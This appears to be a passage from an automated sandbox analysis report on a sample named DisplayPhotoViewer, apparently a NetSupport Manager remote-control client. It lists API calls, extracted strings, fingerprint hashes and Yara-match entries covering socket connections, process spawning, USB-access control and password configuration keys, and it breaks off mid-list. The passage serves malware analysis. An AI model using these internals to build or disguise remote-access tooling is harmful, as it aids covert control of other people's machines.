                                                                                                    Similarity
                                                                                                    • API ID: _malloc_memmove
                                                                                                    • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                                                                    • API String ID: 1183979061-2531374130
                                                                                                    • Opcode ID: 5515f167e16460a9d37948cfc1bd44b09a726d09ba6ddbb2e2d743d504f0eea1
                                                                                                    • Instruction ID: 8a413795910aa854a61ecf1c8b2646081c70e315011e045b2f35bf9a9a7248ad
                                                                                                    • Opcode Fuzzy Hash: 5515f167e16460a9d37948cfc1bd44b09a726d09ba6ddbb2e2d743d504f0eea1
                                                                                                    • Instruction Fuzzy Hash: 3F41A179A0060A9FCB01DF64DC94FEAB7B9FF85219F044269E855A7241EA34F508CBA0
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(PCIImage.dll,?,?,?,?,?,110023F1,?,00000000,?,?,?,218EC38C), ref: 110E99F0
                                                                                                    • GetProcAddress.KERNEL32(00000000,CompressBitmapToJPEG), ref: 110E9A08
                                                                                                    • GetProcAddress.KERNEL32(00000000,CompressBitmapToPNG), ref: 110E9A12
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 110E9A41
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryProc$FreeLoad
                                                                                                    • String ID: CompressBitmapToJPEG$CompressBitmapToPNG$PCIImage.dll
                                                                                                    • API String ID: 2256533930-3959649894
                                                                                                    • Opcode ID: ca754930bd598a6d98cf17161ae83e55d4b71fd3ce574fb9b46ab4de80b8a2d8
                                                                                                    • Instruction ID: e6900cb5de1ae588f16feade9a47c287aed82bf06d5dcbc10e309876cba9ba0c
                                                                                                    • Opcode Fuzzy Hash: ca754930bd598a6d98cf17161ae83e55d4b71fd3ce574fb9b46ab4de80b8a2d8
                                                                                                    • Instruction Fuzzy Hash: 9F2129B6B01118ABDB10DF9EECC59DEF7A8EB84225B148166FD1DD3304E6359D108BE1
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000), ref: 1111B79F
                                                                                                    • InterlockedExchange.KERNEL32(111E4544,00000001), ref: 1111B7C5
                                                                                                    • CreateWindowExA.USER32(00000000,button,11189200,50000000,FFFFEC78,00000000,00000014,0000000E,?,00000001,00000000,00000000), ref: 1111B80B
                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,1111B6C0), ref: 1111B82B
                                                                                                    • SetFocus.USER32(00000000), ref: 1111B842
                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 1111B85C
                                                                                                    • DestroyWindow.USER32(00000000), ref: 1111B872
                                                                                                    • InterlockedExchange.KERNEL32(111E4544,00000000), ref: 1111B889
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
                                                                                                    • String ID: *NoHideFEP$View$button
                                                                                                    • API String ID: 1610953178-1502386645
                                                                                                    • Opcode ID: 6be10358722cd5fa09e0826523a1bff8bf97701c83194793b8d628c17dce3d52
                                                                                                    • Instruction ID: d8ba65d08aa0072bd3d58eefe54997aee3b5c7d595cd4abcbc84e9516d592a6f
                                                                                                    • Instruction Fuzzy Hash: C831A770641321AFE7119FB5DD89B6AFBB8FB04B08F104539EC25DBA88E7709500CB14
                                                                                                    APIs
                                                                                                      • Part of subcall function 110E6E10: LocalAlloc.KERNEL32(00000040,00000014,?,1100D54F,?), ref: 110E6E20
                                                                                                      • Part of subcall function 110E6E10: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D54F,?), ref: 110E6E32
                                                                                                      • Part of subcall function 110E6E10: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D54F,?), ref: 110E6E44
                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D567
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D580
                                                                                                    • _strrchr.LIBCMT ref: 1100D58F
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1100D59F
                                                                                                    • wsprintfA.USER32 ref: 1100D5C0
                                                                                                    • _memset.LIBCMT ref: 1100D5D1
                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D609
                                                                                                    • CloseHandle.KERNEL32(?,00000000), ref: 1100D621
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1100D62A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                                                    • String ID: %sNSSilence.exe %u %u$D
                                                                                                    • API String ID: 1760462761-4146734959
                                                                                                    • Opcode ID: 5c47d791ebb0455a0414624acc2f231ef79ea9f418f3e9565118a7b676644310
                                                                                                    • Instruction ID: 458e4223dd7e5fdac6edea5c1260bbf495d89690d61fca6328f8b539b3dde787
                                                                                                    • Instruction Fuzzy Hash: 5421BA75E51318ABEB50DB90DC49FDDB77C9B08708F108095F619971C4DAB0AA44CF64
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,?,00000000), ref: 10702356
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1070235D
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000), ref: 10702373
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 10702391
                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 1070239B
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 107023AE
                                                                                                    • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),10712188,00000004,?), ref: 107023CD
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 107023F4
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 107023FB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                                                                    • String ID: ProcessIdToSessionId$kernel32.dll
                                                                                                    • API String ID: 2536908267-3889420803
                                                                                                    • Opcode ID: 00935e143c90e49adc82f3ea21c47b46579aeadc60c21bb3c0a709f1f4bf422a
                                                                                                    • Instruction ID: 6eccb3b6f23975030ac6b8fdeb29450f49f28d4fdf2044fc10d82b0bfb9315ab
                                                                                                    • Instruction Fuzzy Hash: F4218072A0021DBBDB01DBA49D89F9EB7FCEB49640F114155FE00D7284DBB4D9029BA5
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 1112F0E3
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1112F104
                                                                                                    • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 1112F114
                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 1112F131
                                                                                                    • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 1112F13D
                                                                                                    • _memset.LIBCMT ref: 1112F157
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc$Version_memset
                                                                                                    • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                                    • API String ID: 1659045089-3162170060
                                                                                                    • Opcode ID: 220d3cf7639b9ef648069bca1bfb7fdab02eca7be9b5ffd978bdfb42a11ab85f
                                                                                                    • Instruction ID: 0910ca5fb44add3cf21b7e5d4f919857c18243e2afa22aa6fdd13c6a39c21dd0
                                                                                                    • Instruction Fuzzy Hash: 4A21E774F413696BF7119BB5EC85F5EFFA89B4670CFA00074E908E7184E670990087E2
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(USER32,?,?,1111146C), ref: 11091429
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1109143D
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1109144A
                                                                                                    • GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 11091457
                                                                                                    • GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 11091464
                                                                                                    • _memset.LIBCMT ref: 11091474
                                                                                                      • Part of subcall function 110913B0: _memset.LIBCMT ref: 110913D3
                                                                                                      • Part of subcall function 110913B0: _memset.LIBCMT ref: 11091405
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$_memset$LibraryLoad
                                                                                                    • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$MonitorFromRect$USER32
                                                                                                    • API String ID: 1187747625-2127564136
                                                                                                    • Opcode ID: 56c665919b1b78a67ab9dc4713c5a8fd398592f2bbb739ac3d4f4b636575fe61
                                                                                                    • Instruction ID: b01443e20630491e1ba768e31bc32c3a0d22064e76839bce87f2a9b6eee50427
                                                                                                    • Instruction Fuzzy Hash: 0EF06871A0070DABC7209F7A9C44E8BF7E9AF98704B10482EF599D7210F674A4408F50
                                                                                                    APIs
                                                                                                    • IsValidSid.ADVAPI32(00000000,00000000,00000000,00000000,11087C90,00000000,?,?,000F037F,00000000,00000000), ref: 11087A1D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Valid
                                                                                                    • String ID:
                                                                                                    • API String ID: 1304828667-0
                                                                                                    • Opcode ID: e4658d644d18372e22aa616dc901083e31233e038d14c2a54df4ca188c26703a
                                                                                                    • Instruction ID: 4157feb83114725fd98a1a85ec113aeff410dfd94b7641b76408bba4d667728f
                                                                                                    • Instruction Fuzzy Hash: 8A419131E0462A9BDB12CFA4D889BAFB7F9EF84705F1041A9ED15E7248D730DA51C7A0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset_strncpy
                                                                                                    • String ID: Client$Password$SecurityKey$SecurityKey2$UseNTSecurity$UserNames$ValidAddresses.
                                                                                                    • API String ID: 3140232205-3737366314
                                                                                                    • Opcode ID: 6ea559c46c9c735a26dc073146d3bf7001a8764100b07665d74e2a00cffffdc0
                                                                                                    • Instruction ID: a09d8f8b4f195433f7b4985c6e6c46c26e945bc7a7e47a3965ca8db74e05986d
                                                                                                    • Opcode Fuzzy Hash: 6ea559c46c9c735a26dc073146d3bf7001a8764100b07665d74e2a00cffffdc0
                                                                                                    • Instruction Fuzzy Hash: 2371F775E0061B9FD701CF28DD90BDAB7A8AF55309F0481A8E99997241EB70FA49CBD0
                                                                                                    APIs
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11070395
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 1107039B
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 110703A1
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 110703AA
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 110703B0
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 110703B6
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • std::exception::exception.LIBCMT ref: 1114373C
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11143751
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection$Exception@8Throw__wcstoi64_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                    • String ID: TracePipe$TracePipeRecv$TracePipeRecvUI$TracePipeSend$TracePipeSendUI$TraceRecv$TraceSend$_debug
                                                                                                    • API String ID: 2906687742-2018363409
                                                                                                    • Opcode ID: 793db74857c0ff7ed66e58ade16ff95ae929c4fd0bfb01fe3dc369a6f9f9563a
                                                                                                    • Instruction ID: 65445e86c2e1711482bc839fdbab266ed1198aef295d4c9dc80becb99371b76a
                                                                                                    • Opcode Fuzzy Hash: 793db74857c0ff7ed66e58ade16ff95ae929c4fd0bfb01fe3dc369a6f9f9563a
                                                                                                    • Instruction Fuzzy Hash: 4B51F7B1B14659AFD741CF798D80AAFFBE9EB45608F51482EE46AD3700EB30AD01CB51
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset_strncat_strncpy$_calloc
                                                                                                    • String ID: Drivers$PrintCapture$Printer
                                                                                                    • API String ID: 3453565913-1525524346
                                                                                                    • Opcode ID: 8007247272584a5c76d384d6e4aa6aeb8582b06e50c28b528786a77dfe3df568
                                                                                                    • Instruction ID: 7ebddecc409a4e08387718463af3d3f4cb5cf5e88379949f02e213de198cf438
                                                                                                    • Opcode Fuzzy Hash: 8007247272584a5c76d384d6e4aa6aeb8582b06e50c28b528786a77dfe3df568
                                                                                                    • Instruction Fuzzy Hash: 94410775F002596FE711CB28DD15FEBB7E99F86308F0440E4E9489B281FA74EA09C792
                                                                                                    APIs
                                                                                                      • Part of subcall function 110D7BA0: EnterCriticalSection.KERNEL32(111E0C5C,11017238,218EC38C,?,?,?,111C0108,1117BDB8,000000FF,?,11019202), ref: 110D7BA1
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110D1530
                                                                                                      • Part of subcall function 11157E51: RaiseException.KERNEL32(?,?,111084C4,?,?,?,?,?,111084C4,?,111C0108), ref: 11157E93
                                                                                                    • gethostbyname.WSOCK32(111E0BD0,218EC38C,00000000,?,00000000), ref: 110D1545
                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117BFB0,000000FF), ref: 110D1551
                                                                                                    • _memmove.LIBCMT ref: 110D157B
                                                                                                    • htons.WSOCK32(00000000), ref: 110D15A1
                                                                                                    • socket.WSOCK32(00000002,00000001,00000000), ref: 110D15B1
                                                                                                    • WSAGetLastError.WSOCK32 ref: 110D15BF
                                                                                                    • connect.WSOCK32(?,?,00000010,?,00000000,000000FF,111E0BE8,00000000,000000FF), ref: 110D15F3
                                                                                                    • WSAGetLastError.WSOCK32 ref: 110D15FE
                                                                                                      • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(111E0BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111E0BD0,00000000,000000FF,218EC38C,?,00000000,00000000,?,?,?,00000000,1117D21B), ref: 110D9983
                                                                                                      • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(11192F38,?,?,?,00000000,1117D21B,000000FF,?,110D7033,?,Invalid Server paramters), ref: 110D998A
                                                                                                    Strings
                                                                                                    • Connect() the socket is not closed, xrefs: 110D14FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$DebugOutputString$CriticalEnterExceptionException@8RaiseSectionThrow_memmoveconnectgethostbynamehtonssocket
                                                                                                    • String ID: Connect() the socket is not closed
                                                                                                    • API String ID: 2474459257-1125742345
                                                                                                    • Opcode ID: ff52e5c06d215aad9486f266d9517293b5ddfa05646e07b71e0b72ba60cfd219
                                                                                                    • Instruction ID: 8ff2fd134f685594d1178374d7259481bd5f3f93977281419a3f3a8e48168d76
                                                                                                    • Opcode Fuzzy Hash: ff52e5c06d215aad9486f266d9517293b5ddfa05646e07b71e0b72ba60cfd219
                                                                                                    • Instruction Fuzzy Hash: 1F417375D00709EFDB10DFA4C844B9EF7B4FF48724F10461AE926A7280EB74A504CBA5
                                                                                                    APIs
                                                                                                    • wsprintfA.USER32 ref: 11015578
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 110155D4
                                                                                                    • RegisterClassA.USER32(00000003), ref: 110155EE
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • CreateWindowExA.USER32(00000008,NSMIdentifyWnd,?,90000000,?,?,?,?,00000000,00000000,00000000), ref: 1101564F
                                                                                                    • UpdateWindow.USER32(00000000), ref: 1101569D
                                                                                                    • SetTimer.USER32(00000000,00000001,?,00000000), ref: 110156D0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Windowwsprintf$ClassCreateCursorErrorExitLastLoadMessageProcessRegisterTimerUpdate
                                                                                                    • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1905683801-829434836
                                                                                                    • Opcode ID: b3e9a7ee195c899a8075d36c0a767881bd778b7107becd49b6413d217b6362f5
                                                                                                    • Instruction ID: 49711948ef559976d9054697858d60f466f2c1f3074a1bee2d529a4b00b3e1d5
                                                                                                    • Opcode Fuzzy Hash: b3e9a7ee195c899a8075d36c0a767881bd778b7107becd49b6413d217b6362f5
                                                                                                    • Instruction Fuzzy Hash: C1414375E00309AFDB50CFA5DC84BDEFBF8BB88308F10842AE518AB244E775A5408F95
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,218EC38C), ref: 110F3101
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 110F3145
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 110F3187
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110F3159
                                                                                                    Strings
                                                                                                    • SetThreadExecutionState, xrefs: 110F313C
                                                                                                    • Prevent Power Save (new count=%d,%d), same state=x%x, xrefs: 110F31AA
                                                                                                    • Prevent Power Save (new count=%d,%d, newstate=x%x), laststate=x%x, xrefs: 110F3175
                                                                                                    • Client, xrefs: 110F308B
                                                                                                    • *DisablePreventPowerSave, xrefs: 110F3086
                                                                                                    • Kernel32.dll, xrefs: 110F30FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressErrorFreeLastLoadProc__wcstoi64
                                                                                                    • String ID: *DisablePreventPowerSave$Client$Kernel32.dll$Prevent Power Save (new count=%d,%d), same state=x%x$Prevent Power Save (new count=%d,%d, newstate=x%x), laststate=x%x$SetThreadExecutionState
                                                                                                    • API String ID: 338032539-2187775511
                                                                                                    • Opcode ID: a331a553af070eb09a2082817ca8a01a710055d86bac074850e30d7b6147dd43
                                                                                                    • Instruction ID: 867bc4d53d25580872fdf75797e2c4a47702664779552d91db915e32514c9cef
                                                                                                    • Opcode Fuzzy Hash: a331a553af070eb09a2082817ca8a01a710055d86bac074850e30d7b6147dd43
                                                                                                    • Instruction Fuzzy Hash: A9416AB1E49269AFDB01CFDA98C1AAEFBF4FB48625F40407EE815E7604D7301904CB65
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
